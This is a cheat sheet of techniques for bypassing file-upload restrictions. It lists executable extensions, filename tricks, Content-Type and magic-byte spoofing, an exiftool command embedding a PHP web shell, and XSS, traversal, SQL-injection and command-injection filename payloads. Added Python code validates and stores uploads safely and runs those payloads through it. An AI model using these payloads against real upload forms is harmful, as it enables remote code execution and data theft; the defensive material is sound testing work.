Unrestricted File Upload


Name:

1. Use alternate extensions:

PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module, .phpt
ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml, .asa (IIS <= 7.5), .aspx;1.jpg (IIS < 7.0)
JSP: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
Coldfusion: .cfm, .cfml, .cfc, .dbm
Flash: .swf
Perl: .pl, .cgi, .pm, .lib
Erlang Yaws Web Server: .yaws

2. Random capitalization: PhP, pHp, …

3. Adding special characters before or after the extension (brute force with Burp):

%20%0a%00%0d/\.….….;./.\\x00file.php123png

4. Break the filename length limit: AAAA…AAAA.php.png

5. Duplicate extension:

file.php.png.jpg
file.php%00.png

Content-Type:

Change from Content-Type: application/x-php to Content-Type: image/jpeg
More: https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt

Magic byte:

List of file signature: https://en.wikipedia.org/wiki/List_of_file_signatures
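The filename, Content-Type and magic-byte tricks above all target the same weak validator. The following is an added example, not code from the original article, of an upload check that closes each of them: an extension allowlist applied after lowercasing, exactly one dot in the name, a length cap, a restricted character set for the base name, a Content-Type that must agree with the extension, and a file-signature check on the body. The allowlist, the 100-character limit and the function name are assumptions chosen for the demo.

```python
import re
from typing import Tuple

# Example allowlist policy (assumed for this demo): only raster images are accepted.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

# The Content-Type the client must declare for each extension.
EXPECTED_CONTENT_TYPE = {
    "png": "image/png",
    "jpg": "image/jpeg",
    "jpeg": "image/jpeg",
    "gif": "image/gif",
}

# File signatures (magic bytes) the body must start with; see the Wikipedia list above.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

MAX_NAME_LEN = 100  # assumed limit; over-long names are rejected, never truncated


def validate_upload(filename: str, content_type: str, data: bytes) -> Tuple[bool, str]:
    """Return (True, extension) for an acceptable upload, else (False, reason).

    Each check maps to one trick on the list: control/null bytes and path
    separators (special characters, traversal), exactly one dot (duplicate
    extensions), lowercased allowlist (alternate extensions, random
    capitalization), length cap (break limit), and Content-Type plus magic
    bytes (spoofed type).
    """
    if any(ord(c) < 0x20 or c in "/\\" for c in filename):
        return False, "control character or path separator in name"
    if len(filename) > MAX_NAME_LEN:
        return False, "name too long"
    if filename.count(".") != 1:
        return False, "name must contain exactly one extension"
    base, ext = filename.split(".")
    ext = ext.lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension not allowed: " + ext
    # Base name is limited to a plain character set: quotes, backticks, '$',
    # ';', '%', spaces and trailing dots do not survive this.
    if not re.fullmatch(r"[A-Za-z0-9_-]+", base):
        return False, "base name contains disallowed characters"
    # Content-Type is client-controlled: it must agree with the extension,
    # but it is never trusted on its own.
    declared = content_type.split(";", 1)[0].strip().lower()
    if declared != EXPECTED_CONTENT_TYPE[ext]:
        return False, "content-type does not match extension"
    if not data.startswith(MAGIC[ext]):
        return False, "file signature does not match extension"
    return True, ext
```

A valid signature does not prove the body is harmless (the Exif trick below hides code in a comment field behind a real PNG header), so this check belongs with two server-side rules: the upload directory is never served with script execution, and images are re-encoded before storage, which discards metadata.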

Exif:

exiftool -Comment='<?php system($_REQUEST['cmd']); ?>' test.png

XSS:

<svg onload=alert(document.domain)>

Path Traversal

../../../file.png

SQLi

sleep(10)-- -.jpg

RCE

a`whoami`z.jpg

a$(whoami)x.jpg

a;sleep 30;z.jpg
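The traversal, SQLi and RCE payloads above all ride on the client-supplied filename being reused by the server. The following added example (not code from the original article) shows the storage side that makes them inert: the file is written under a random server-chosen name inside a fixed directory, the original name is recorded only as a bound SQL parameter, and stored files are served with headers that stop a browser from treating them as markup, which also covers the SVG XSS case since SVG is not in the allowlist. The table layout, header set and function names are assumptions for the demo; the hostile filenames fed to `demo()` are the ones listed above.

```python
import os
import re
import secrets
import sqlite3
import tempfile
from typing import Dict

# Assumed: only raster images reach this point (no SVG, no HTML), already
# checked against an extension allowlist, Content-Type and magic bytes.
SAFE_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}
MIME = {"png": "image/png", "jpg": "image/jpeg", "jpeg": "image/jpeg", "gif": "image/gif"}


def store_upload(original_name: str, ext: str, data: bytes,
                 upload_dir: str, conn: sqlite3.Connection) -> str:
    """Write data under a random server-chosen name and record the upload.

    The client's filename never reaches the filesystem or a shell, so ../,
    backticks, $(...) and ';' in it have nothing to act on; it is stored
    only as a bound SQL parameter, so the SQL payload is inert as well.
    """
    if ext not in SAFE_EXTENSIONS:
        raise ValueError("extension not in allowlist")
    storage_name = secrets.token_hex(16) + "." + ext
    root = os.path.realpath(upload_dir)
    dest = os.path.realpath(os.path.join(root, storage_name))
    if os.path.dirname(dest) != root:  # defense in depth against traversal
        raise ValueError("resolved path escapes upload directory")
    with open(dest, "wb") as fh:
        fh.write(data)
    conn.execute(
        "INSERT INTO uploads (original_name, storage_name) VALUES (?, ?)",
        (original_name, storage_name),
    )
    conn.commit()
    return storage_name


def download_headers(storage_name: str) -> Dict[str, str]:
    """Headers for serving a stored file so the browser never executes it."""
    ext = storage_name.rsplit(".", 1)[-1]
    return {
        "Content-Type": MIME[ext],
        "X-Content-Type-Options": "nosniff",  # no sniffing into text/html
        "Content-Disposition": 'attachment; filename="' + storage_name + '"',
        "Content-Security-Policy": "default-src 'none'; sandbox",  # no script even if rendered inline
    }


def demo() -> Dict[str, object]:
    """Store the hostile filenames from the list above and report what ended up where."""
    # Constructed inputs: the filename payloads above with a minimal JPEG header as body.
    hostile = ["../../../file.png", "sleep(10)-- -.jpg", "a`whoami`z.jpg",
               "a$(whoami)x.jpg", "a;sleep 30;z.jpg"]
    body = b"\xff\xd8\xff\xe0" + b"\x00" * 12
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE uploads (id INTEGER PRIMARY KEY, original_name TEXT, storage_name TEXT)")
    with tempfile.TemporaryDirectory() as d:
        stored = [store_upload(name, "jpg", body, d, conn) for name in hostile]
        on_disk = sorted(os.listdir(d))
    rows = conn.execute("SELECT original_name FROM uploads ORDER BY id").fetchall()
    return {
        "stored_names": stored,
        "on_disk": on_disk,
        "db_names": [r[0] for r in rows],
        "all_random": all(re.fullmatch(r"[0-9a-f]{32}\.jpg", n) for n in stored),
    }


if __name__ == "__main__":
    print(demo())
```

Any later processing that shells out (image resizing, virus scanning) must use the random storage name with an argument list, never the original name in a shell string; the original name is display data and should be escaped when rendered.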
